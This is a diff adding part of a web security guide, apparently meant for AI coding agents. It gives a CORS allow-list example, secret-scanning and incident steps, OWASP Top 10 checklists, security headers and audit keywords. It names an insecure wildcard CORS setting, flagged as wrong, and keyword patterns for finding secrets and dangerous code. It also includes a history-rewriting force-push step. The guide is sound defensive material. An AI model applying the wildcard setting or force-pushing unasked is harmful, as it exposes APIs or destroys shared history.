+ app.use(cors({
196
+ origin: ["https://myapp.com", "https://admin.myapp.com"],
197
+ methods: ["GET", "POST", "PUT", "DELETE"],
198
+ credentials: true,
199
+ }));
200
+
201
+ // ❌ HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
202
+ // ❌ cors({ origin: "*" }) ← allows any website to call your API
203
+ // ✅ cors({ origin: ["https://myapp.com"] }) ← whitelist specific domains
204
+ ```
205
+
206
+ ---
207
+
208
+ ## Secret Scanning
209
+
210
+ ```
211
+ Secrets that MUST be in environment variables:
212
+ - Database connection strings
213
+ - API keys (Stripe, SendGrid, etc.)
214
+ - JWT signing secrets
215
+ - OAuth client secrets
216
+ - Encryption keys
217
+
218
+ Detection tools:
219
+ - git-secrets (pre-commit hook)
220
+ - TruffleHog / detect-secrets (scan history)
221
+ - GitHub secret scanning (automatic)
222
+ - GitGuardian (enterprise)
223
+
224
+ If a secret is committed:
225
+ 1. IMMEDIATELY rotate the secret (new key/password)
226
+ 2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
227
+ 3. Force-push cleaned history
228
+ 4. Audit access logs for the compromised secret
229
+ 5. Post-incident review
230
+ ```
231
+
232
+ ---
233
+
234
+ ---
235
+
236
+ ## Security Checklists
237
+
238
+ ---
239
+
240
+ ### OWASP Top 10 Audit Checklist
241
+
242
+ #### A01: Broken Access Control
243
+ - [ ] Authorization on all protected routes
244
+ - [ ] Deny by default
245
+ - [ ] Rate limiting implemented
246
+ - [ ] CORS properly configured
247
+
248
+ #### A02: Cryptographic Failures
249
+ - [ ] Passwords hashed (bcrypt/argon2, cost 12+)
250
+ - [ ] Sensitive data encrypted at rest
251
+ - [ ] TLS 1.2+ for all connections
252
+ - [ ] No secrets in code/logs
253
+
254
+ #### A03: Injection
255
+ - [ ] Parameterized queries
256
+ - [ ] Input validation on all user data
257
+ - [ ] Output encoding for XSS
258
+ - [ ] No eval() or dynamic code execution
259
+
260
+ #### A04: Insecure Design
261
+ - [ ] Threat modeling done
262
+ - [ ] Security requirements defined
263
+ - [ ] Business logic validated
264
+
265
+ #### A05: Security Misconfiguration
266
+ - [ ] Unnecessary features disabled
267
+ - [ ] Error messages sanitized
268
+ - [ ] Security headers configured
269
+ - [ ] Default credentials changed
270
+
271
+ #### A06: Vulnerable Components
272
+ - [ ] Dependencies up to date
273
+ - [ ] No known vulnerabilities
274
+ - [ ] Unused dependencies removed
275
+
276
+ #### A07: Authentication Failures
277
+ - [ ] MFA available
278
+ - [ ] Session invalidation on logout
279
+ - [ ] Session timeout implemented
280
+ - [ ] Brute force protection
281
+
282
+ #### A08: Integrity Failures
283
+ - [ ] Dependency integrity verified
284
+ - [ ] CI/CD pipeline secured
285
+ - [ ] Update mechanism secured
286
+
287
+ #### A09: Logging Failures
288
+ - [ ] Security events logged
289
+ - [ ] Logs protected
290
+ - [ ] No sensitive data in logs
291
+ - [ ] Alerting configured
292
+
293
+ #### A10: SSRF
294
+ - [ ] URL validation implemented
295
+ - [ ] Allow-list for external calls
296
+ - [ ] Network segmentation
297
+
298
+ ---
299
+
300
+ ### Authentication Checklist
301
+
302
+ - [ ] Strong password policy
303
+ - [ ] Account lockout
304
+ - [ ] Secure password reset
305
+ - [ ] Session management
306
+ - [ ] Token expiration
307
+ - [ ] Logout invalidation
308
+
309
+ ---
310
+
311
+ ### API Security Checklist
312
+
313
+ - [ ] Authentication required
314
+ - [ ] Authorization per endpoint
315
+ - [ ] Input validation
316
+ - [ ] Rate limiting
317
+ - [ ] Output sanitization
318
+ - [ ] Error handling
319
+
320
+ ---
321
+
322
+ ### Data Protection Checklist
323
+
324
+ - [ ] Encryption at rest
325
+ - [ ] Encryption in transit
326
+ - [ ] Key management
327
+ - [ ] Data minimization
328
+ - [ ] Secure deletion
329
+
330
+ ---
331
+
332
+ ### Security Headers
333
+
334
+ |Header|Purpose|
335
+ |--------|---------|
336
+ |**Content-Security-Policy**|XSS prevention|
337
+ |**X-Content-Type-Options**|MIME sniffing|
338
+ |**X-Frame-Options**|Clickjacking|
339
+ |**Strict-Transport-Security**|Force HTTPS|
340
+ |**Referrer-Policy**|Referrer control|
341
+
342
+ ---
343
+
344
+ ### Quick Audit Commands
345
+
346
+ |Check|What to Look For|
347
+ |-------|------------------|
348
+ |Secrets in code|password, api_key, secret|
349
+ |Dangerous patterns|eval, innerHTML, SQL concat|
350
+ |Dependency issues|npm audit, snyk|
351
+
352
+ ---
353
+
354
+ **Usage:** Copy relevant checklists into your PLAN.md or security report.